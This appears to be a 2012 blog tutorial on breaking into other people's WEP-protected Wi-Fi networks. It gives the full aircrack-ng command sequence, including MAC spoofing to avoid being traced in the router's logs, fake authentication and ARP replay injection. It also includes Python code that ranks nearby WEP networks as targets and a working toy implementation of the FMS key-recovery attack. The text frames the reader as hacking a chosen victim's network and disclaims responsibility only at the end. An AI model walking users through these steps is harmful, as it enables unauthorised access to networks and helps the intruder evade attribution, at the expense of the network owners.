How to Hack a Wifi or Wireless Password

Written By Unknown on Thursday, January 12, 2012

Today I will explain how to crack a Wifi or wireless password in just 10 to 15 minutes. This hack is based on cracking a WEP encryption key. So tighten your belts for a new hack and let us begin. I have also included a video below the post, so you can read and watch....


1. Get the Backtrack Linux Live CD
Backtrack Linux Live CD (the best Linux distribution available to hackers, with more than 2000 hacking tools built in).
Download the Backtrack Linux Live CD from here:


Pick the target: the network whose password you want to hack or crack.
Now put the Backtrack Linux CD into your CD drive and boot from it. After it starts, click the black box in the lower left corner to open a "Konsole". Now you have to put your Wifi card into monitor mode. First list your wireless interfaces by typing:

airmon-ng

You will see the name of your wireless card (mine is named "ath0"). From here on, substitute your card's name wherever I write "ath0". Now type:
airmon-ng stop ath0

then type:

ifconfig wifi0 down

then type:

macchanger --mac 00:11:22:33:44:55 wifi0

then type:

airmon-ng start wifi0

The steps above spoof your MAC address: the card now presents 00:11:22:33:44:55 instead of its real hardware address, so the router's logs and anyone's capture show a fake MAC rather than one that can be tied to your card. It does not hide you from someone watching the channel, but it keeps your real MAC out of the target's records. (With the madwifi driver used here, wifi0 is the physical device and ath0 is the interface on top of it, which is why the MAC is changed on wifi0 while airodump-ng runs on ath0.)

Now type in:

airodump-ng ath0

All of the above steps in a single screen shot:

Now you will see a list of wireless networks in Konsole. Some will have a better signal than others; always pick one with good signal strength, because with a weak signal collecting enough packets takes a very long time, or the crack may not succeed at all.
Once you see the network list, pick the network you want to hack. To freeze the airodump screen, hold the Ctrl key and press C.
Now you'll see something like this:


Now find the network you want to hack and MAKE SURE that the ENC column says WEP for that network. If it says WPA or a WPA variant then move on... You can still crack WPA with Backtrack and some other tools, but that is a whole other ball game, and you need to master WEP first.

Once you have picked the network, note its channel number and BSSID. The BSSID will look like this:

00:23:69:bb:2d:0f

The channel number will be under the heading that says "CH".
As shown in this picture:

Now in the same Konsole window type:
airodump-ng -c (channel) -w (file name) --bssid (BSSID) ath0
The file name can be whatever you want. This file is where airodump stores the packets you capture, for cracking later. Do not include an extension... just choose a word that you'll remember. I usually name mine "Ben" because I can always remember it. It's just because I love Ben10.... hahahaha :D
Note: If you want to crack more than one network in the same session, you need a different file name for each one or it will not work. I usually name them ben1, ben2 etc.
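Besides the .cap file, the airodump-ng run above also writes (file name)-01.csv, which lists every network it saw with its encryption, channel, signal and IV count. The following Python is an added example, not code from the original post or from the aircrack-ng project: it parses that CSV, keeps only the WEP networks, sorts them strongest-signal first, flags the weak ones, and builds the exact airodump-ng command for the pick. The CSV sample is constructed for this example (the column layout is airodump-ng's; the rows, MACs other than the page's BSSID, and counts are made up).

```python
"""Pick WEP targets from the CSV that airodump-ng writes alongside the .cap file."""
import csv
import io

# Constructed sample of an airodump-ng <name>-01.csv. The header line is the layout
# airodump-ng writes; the access points, station and counts below it are made up.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:23:69:BB:2D:0F, 2012-01-12 20:01:11, 2012-01-12 20:05:40,  6,  54, WEP , WEP, , -41, 312, 1843,   0.  0.  0.  0,   6, HomeAP, 
00:1A:2B:3C:4D:5E, 2012-01-12 20:01:12, 2012-01-12 20:05:40, 11,  54, WPA2, CCMP, PSK, -60, 250,    0,   0.  0.  0.  0,   9, Office-5G, 
00:0F:66:AA:BB:CC, 2012-01-12 20:01:15, 2012-01-12 20:05:39,  1,  11, WEP , WEP, , -78,  90,   12,   0.  0.  0.  0,   5, OldAP, 
00:12:34:56:78:9A, 2012-01-12 20:01:20, 2012-01-12 20:05:38,  6,  54, OPN , , , -55, 200,    0,   0.  0.  0.  0,   4, Cafe, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:11:22:33:44:55, 2012-01-12 20:02:00, 2012-01-12 20:05:40, -50, 120, 00:23:69:BB:2D:0F, 
"""


def parse_airodump_csv(text):
    """Return the access-point table as a list of dicts keyed by the CSV header names.

    The file holds two tables; a blank line separates the AP table from the station table."""
    aps, header = [], None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row:
            if header:
                break                          # end of the AP table
            continue
        row = [field.strip() for field in row]
        if row[0] == "BSSID":
            header = row
        elif header and len(row) >= len(header):
            aps.append(dict(zip(header, row)))
    return aps


def wep_targets(aps, min_power_dbm=-70):
    """WEP networks only, strongest signal first. Weak signals are kept but flagged,
    because a weak link means slow IV collection or no crack at all."""
    targets = []
    for ap in aps:
        if ap["Privacy"].split() != ["WEP"]:   # skip OPN, WPA, WPA2 ...
            continue
        power = int(ap["Power"])
        targets.append({
            "bssid": ap["BSSID"],
            "channel": int(ap["channel"]),
            "essid": ap["ESSID"],
            "power": power,
            "ivs": int(ap["# IV"]),
            "usable": power >= min_power_dbm,
        })
    targets.sort(key=lambda t: t["power"], reverse=True)
    return targets


def airodump_command(target, capture_name, iface="ath0"):
    """The channel-locked capture command from the tutorial, filled in for this target."""
    return (f"airodump-ng -c {target['channel']} -w {capture_name} "
            f"--bssid {target['bssid']} {iface}")


if __name__ == "__main__":
    for t in wep_targets(parse_airodump_csv(SAMPLE_CSV)):
        flag = "" if t["usable"] else "  (weak signal, expect a long wait)"
        print(f"{t['essid']:<10} {t['bssid']} ch {t['channel']:>2} {t['power']} dBm "
              f"{t['ivs']} IVs{flag}")
        print("   ", airodump_command(t, "ben"))
```

Run it against a real (file name)-01.csv by reading the file into `parse_airodump_csv` instead of `SAMPLE_CSV`; the -70 dBm cutoff is an assumption for this example, not a figure from the post.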
After you type the last command, the screen will change and airodump will start showing the packets your computer is collecting. You will also see a column marked "IV" (newer airodump-ng versions label it "#Data") with a number underneath. This stands for "Initialization Vector": every WEP data frame carries a 24-bit IV in the clear, and each distinct IV you capture gives aircrack-ng another sample of keystream under the same key, which is what the statistical attack on the key needs. Once you have at least 5000 IVs you can try to crack the key. I've cracked a few with just 5000 and others have taken over 60,000. How many you need depends on the key length (40-bit or 104-bit) and on luck, not on how "hard" the password looks: WEP cracking does not guess passwords, it recovers the key bytes directly, so a longer key simply needs more packets.
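To show why the IV count is what matters, here is an added example (not code from the original post or from the aircrack-ng project) in Python: it implements RC4, the way WEP seeds it with IV || key, and the 2001 Fluhrer-Mantin-Shamir (FMS) attack that recovers the key one byte at a time from nothing but each frame's IV and first ciphertext byte. The key, the "capture" and the filler traffic are all constructed here. In real traffic the FMS weak IVs are rare, which is why the tutorial waits for tens of thousands of IVs; aircrack-ng now defaults to the newer PTW attack, which uses every IV and needs far fewer of them, but the principle is the same: each IV is a fresh sample of keystream under the unchanged key.

```python
"""Toy Fluhrer-Mantin-Shamir (FMS) WEP key recovery from captured IVs (example code)."""
import random

SNAP_DSAP = 0xAA   # first plaintext byte of every WEP data frame (LLC/SNAP header), so known


def rc4_ksa(key):
    """RC4 key scheduling: the initial permutation S for key (a list of byte values)."""
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    return S


def rc4_keystream(key, n):
    """First n RC4 keystream bytes for key."""
    S, i, j, out = rc4_ksa(key), 0, 0, []
    for _ in range(n):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % 256])
    return out


def wep_first_cipher_byte(iv, key):
    """WEP seeds RC4 with IV || key; the IV travels in the clear in the frame header."""
    return rc4_keystream(list(iv) + list(key), 1)[0] ^ SNAP_DSAP


def build_capture(key, n_filler, rng):
    """Constructed capture: (iv, first ciphertext byte) pairs, as a sniffer would log them.

    Real traffic produces an FMS weak IV (B+3, 255, X) only about once per 65k frames,
    which is why the tutorial waits for tens of thousands of IVs; here they are planted
    directly, mixed with random-IV filler frames."""
    ivs = [(b + 3, 255, x) for b in range(len(key)) for x in range(256)]
    ivs += [tuple(rng.randrange(256) for _ in range(3)) for _ in range(n_filler)]
    rng.shuffle(ivs)
    return [(iv, wep_first_cipher_byte(iv, key)) for iv in ivs]


def key_checks_out(key, pkts):
    """Accept a candidate only if it decrypts byte 0 of several frames to 0xAA."""
    return all(wep_first_cipher_byte(iv, key) == c for iv, c in pkts[:8])


def fms_crack(pkts, keylen, fudge=3):
    """Recover the WEP key byte by byte; `fudge` is how many top guesses per byte to try."""
    def candidates(prefix):
        B = len(prefix)                          # index of the key byte under attack
        votes = [0] * 256
        for iv, c in pkts:
            known = list(iv) + prefix            # K[0..B+2] is known: IV plus recovered bytes
            S, j = list(range(256)), 0
            for i in range(B + 3):               # replay the KSA as far as the key is known
                j = (j + S[i] + known[i]) % 256
                S[i], S[j] = S[j], S[i]
            # FMS "resolved" condition: keystream byte 0 will (with about 5% probability)
            # equal the value KSA step B+3 swaps into S[B+3], which exposes K[B+3]
            if S[1] >= B + 3 or (S[1] + S[S[1]]) % 256 != B + 3:
                continue
            out = c ^ SNAP_DSAP                  # keystream byte 0, since plaintext is known
            votes[(S.index(out) - j - S[B + 3]) % 256] += 1   # K[B+3] = j' - j - S[B+3]
        return sorted(range(256), key=lambda k: -votes[k])[:fudge]

    def search(prefix):                          # depth-first over the top guesses per byte
        if len(prefix) == keylen:
            return prefix if key_checks_out(prefix, pkts) else None
        for guess in candidates(prefix):
            found = search(prefix + [guess])
            if found is not None:
                return found
        return None

    return search([])


SECRET_KEY = list(b"ben42")   # constructed 40-bit key; the attacker never sees it


def demo():
    """Crack the constructed capture; returns the recovered key bytes."""
    capture = build_capture(SECRET_KEY, n_filler=1000, rng=random.Random(1))
    return fms_crack(capture, keylen=len(SECRET_KEY))


if __name__ == "__main__":
    found = demo()
    print("KEY FOUND! [", ":".join(f"{b:02X}" for b in found), "] (ASCII:", bytes(found).decode(), ")")
```

The vote-and-verify structure is the same idea as aircrack-ng's fudge factor: the most-voted byte is usually right, and a wrong branch is rejected because it fails to decrypt the first byte of real frames to 0xAA. Nothing here depends on the key being a "weak password"; only the number of usable IVs and the key length matter.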
4. Cracking the WEP password
Now leave this window up and running and open a second Konsole window. In that window type:
aireplay-ng -1 0 -a (BSSID) -h 00:11:22:33:44:55 ath0
This is a fake authentication: it tells the router to accept your (spoofed) MAC as an associated client even though you do not know the key, which the router requires before it will respond to packets you replay at it. If the command is successful, you will see about 4 lines of text, with the last one saying something like "Association successful :-)". If this happens, great! You're almost there. (If it keeps failing, the router may be filtering MAC addresses, or your card may not support packet injection.)
Now type:
aireplay-ng -3 -b (BSSID) -h 00:11:22:33:44:55 ath0
This is the ARP request replay attack. It will print a bunch of text and then a line showing that your computer is reading packets and waiting for an ARP request (and ACKs). Don't worry about what this means... just know that this is your meal ticket. Now you just sit and wait. Once your computer finally captures an ARP request, it will replay it to the router over and over, and the router answers each one with a freshly encrypted frame, generating hundreds of new packets (and new IVs) per second. Sometimes this starts within seconds... sometimes you have to wait a few minutes. Just be patient. When it finally happens, switch back to the first Konsole window and you will see the number under IV start to rise rapidly. Great! This means you are almost done! When the number reaches AT LEAST 5000 you can begin cracking the key. It will probably take more than this, but I always start my cracking at 5000, just in case they have a really weak password.
Now you need to open a third and final Konsole window. This is where we actually crack the password. Type:
aircrack-ng -b (BSSID) (filename)-01.cap
Remember the file name you chose earlier? Mine is "Ben", so airodump wrote Ben-01.cap. Do not put a space between the name and -01.cap; type it exactly as you see it. So for me, I would type aircrack-ng -b (BSSID) Ben-01.cap. Once you do this, aircrack will start and try to crack the key. You usually have to wait for more like 10,000 to 20,000 IVs before it succeeds. If there are not enough yet, aircrack will test what you have so far and then say something like "Failed. Next try with 10000 IVs". DO NOT DO ANYTHING! It keeps running... it is just letting you know that it is waiting until more IVs are gathered. Once you pass the 10,000 mark it will automatically run again and try to crack it. If that fails it will say "Failed. Next try with 15000 IVs" and so on, until it finally gets it.
If you did everything correctly up to this point, before too long you will have the key! If the key looks silly, don't worry, it will still work. Some owners type their key as ASCII text (5 characters for a 40-bit key, 13 for a 104-bit key); others type it as HEX digits (10 or 26 of them). aircrack does not care which: it always prints the recovered key as hex bytes separated by colons, like this:
KEY FOUND! [ 0F:AB:94:27:CF ]
When every byte is a printable character, which is what an ASCII key gives you, it also shows the text form next to it. For example, the 40-bit ASCII key "abcde" is shown as:
KEY FOUND! [ 61:62:63:64:65 ] (ASCII: abcde )
Either form works: you can type the ASCII text, or the hex digits without the colons, and it will connect you to the network.

Just remove the colons from the hex key, boot back into whatever operating system you use, try to connect to the network, type in the key without the colons, and presto! You are in!

It may seem like a lot to deal with if you've never done it, but after a few successful tries you will be very fast with it. If I am near a WEP encrypted router with a good signal, I can often crack the key in just a few minutes.

I am not responsible for what you do with this information. Any dangerous or illegal activity you do falls entirely on you because... technically... this is only for you to test your own network's security.
